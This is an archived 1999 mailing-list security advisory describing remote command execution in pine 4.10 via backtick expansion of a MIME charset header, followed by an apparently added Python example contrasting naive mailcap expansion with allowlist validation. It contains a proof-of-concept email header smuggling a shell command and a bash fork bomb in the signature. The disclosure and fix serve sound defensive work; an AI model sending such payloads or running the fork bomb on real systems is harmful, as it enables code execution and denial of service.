remote exploit on pine 4.10 - neverending story?

From: Michal Zalewski (lcamtufat_private)
Date: Sun Feb 07 1999 - 15:22:17 PST


    Affected systems:
    -----------------
    
      Any Un*x system running 'pine' up to version 4.10 (the latest release at
      the time of writing).
    
    Compromise:
    -----------
    
      Remote execution of arbitrary code when a message is viewed.
    
    Details:
    --------
    
      About five months ago, I reported a vulnerability in the metamail package
      used with pine. I also noticed that the '`' character is incorrectly
      expanded by pine. The problem has been ignored (probably no one understood
      what I was talking about? ;-). But no matter. An excerpt from /etc/mailcap:
    
      text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr
      '[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput
    
    Impact:
    -------
    
      And now, ladies and gentlemen - my old bug, reinvented. Usually, the above
      mailcap line is expanded to:
    
      [...] execve </bin/sh> (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]'
            '[a-z]'`" = iso-8859-1)
    
      Hmm, but take a look at this message:
    
    ************************** MIME MESSAGE FOLLOWS **************************
    From: Attacker <attackerat_private>
    To: Victim <victimat_private>
    Subject: Happy birthday
    ...
    MIME-Version: 1.0
    Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"
    
    --8323328-235065145-918425607=:319
    Content-Type: TEXT/PLAIN; charset='US-ASCII'
    
    Make a wish...
    
    --8323328-235065145-918425607=:319
    Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
    Content-Transfer-Encoding: BASE64
    Content-Description: wish
    Content-Disposition: attachment; filename="wish.c"
    
    ...it could be your last.
    *************************** MIME MESSAGE ENDS ***************************
    
      The result is:
    
      [...] execve </bin/sh> (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr
            '[A-Z]' '[a-z]'`" = iso-8859-1)
    
      ...and arbitrary code ('touch ME', with the space encoded using the
      ${IFS} trick) is executed when the message is viewed.
    
    Fix:
    ----
    
      Well, it's the second time I report problems with ` in headers.
      Maybe pine developers should wait a little longer ;-)
    
    _______________________________________________________________________
    Michal Zalewski [lcamtufat_private] [ENSI / marchew] [dione.ids.pl SYSADM]
    [lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};:
    [voice phone: +48 (0) 22 813 25 86] [pager (MetroBip): 0 642 222 813]
    To iterate is human, to recurse, divine [P. Deutsch]
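The expansion described above, and the check that should have stood between the header and /bin/sh, as an added example (this is not code from pine, metamail or the post). It parses a message constructed to mirror the one above (addresses made up, the first part's charset written as a bare token), substitutes the charset parameter into the post's mailcap test= command the way the post shows metamail doing it (raw value wrapped in single quotes), and contrasts that with a variant that refuses any charset outside a conservative allowlist. The allowlist regex, the function names and the scan_parts helper are this example's own assumptions, not anything pine or metamail does.

```python
"""Mailcap %{charset} expansion: the naive form from the post vs. a validated one.

Added example, not code from pine, metamail or the post.  SAMPLE_MESSAGE is
constructed to mirror the message in the post (addresses are made up)."""
import email
import re
import shlex

# The /etc/mailcap 'test=' command quoted in the post.
MAILCAP_TEST = "test \"`echo %{charset} | tr '[A-Z]' '[a-z]'`\" = iso-8859-1"

# Constructed sample: same structure, boundary and Content-Type parameters as
# the post's message; the first part's charset is a bare token here.
SAMPLE_MESSAGE = """\
From: Attacker <attacker@example.invalid>
To: Victim <victim@example.invalid>
Subject: Happy birthday
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset=US-ASCII

Make a wish...

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
Content-Transfer-Encoding: BASE64
Content-Description: wish
Content-Disposition: attachment; filename="wish.c"

...it could be your last.
--8323328-235065145-918425607=:319--
"""

# Assumption for this example: a charset name is letters, digits and a few
# punctuation characters, at most 40 characters.  Deliberately stricter than
# the MIME grammar; it excludes quotes, whitespace and every shell
# metacharacter ('`', '$', '{', ';', '|', ...).
CHARSET_TOKEN = re.compile(r"[A-Za-z0-9][A-Za-z0-9._:+-]{0,39}")


def expand_naive(template, charset):
    """Substitute %{charset} as the post shows metamail doing it: the raw
    header value wrapped in single quotes, with no validation at all."""
    return template.replace("%{charset}", "'" + charset + "'")


def expand_hardened(template, charset):
    """Refuse to build a shell command unless the charset is a plain token."""
    if not CHARSET_TOKEN.fullmatch(charset):
        raise ValueError("refusing to expand mailcap entry: bad charset %r" % charset)
    return template.replace("%{charset}", "'" + charset + "'")


def quote_only(charset):
    """What generic shell quoting alone would produce for the value."""
    return shlex.quote(charset)


def scan_parts(raw_message):
    """Walk the MIME parts as a MUA would and record, for each text/plain
    part, the charset parameter and whether the allowlist accepts it."""
    msg = email.message_from_string(raw_message)
    results = []
    for part in msg.walk():
        if part.get_content_type() != "text/plain":
            continue
        charset = part.get_param("charset")
        results.append((charset, bool(CHARSET_TOKEN.fullmatch(charset or ""))))
    return results


if __name__ == "__main__":
    for charset, accepted in scan_parts(SAMPLE_MESSAGE):
        print("charset=%r  accepted=%s" % (charset, accepted))
        print("  naive   : sh -c", expand_naive(MAILCAP_TEST, charset))
        try:
            print("  hardened: sh -c", expand_hardened(MAILCAP_TEST, charset))
        except ValueError as err:
            print("  hardened:", err)
```

Note that quoting alone is not the fix here: shlex.quote() on the malicious value yields `'``touch${IFS}ME``'`, the very string the post shows metamail building, and the post shows that string running touch anyway. The reading this example takes (the example's, not the post's) is that the substitution site sits inside a backtick inside double quotes, where the first unescaped backtick ends the substitution regardless of the single quotes, so the pair of backticks in the header closes metamail's quoted echo early and opens a fresh substitution. Validating the value before it ever reaches sh -c sidesteps that question entirely.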
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:33:00 PDT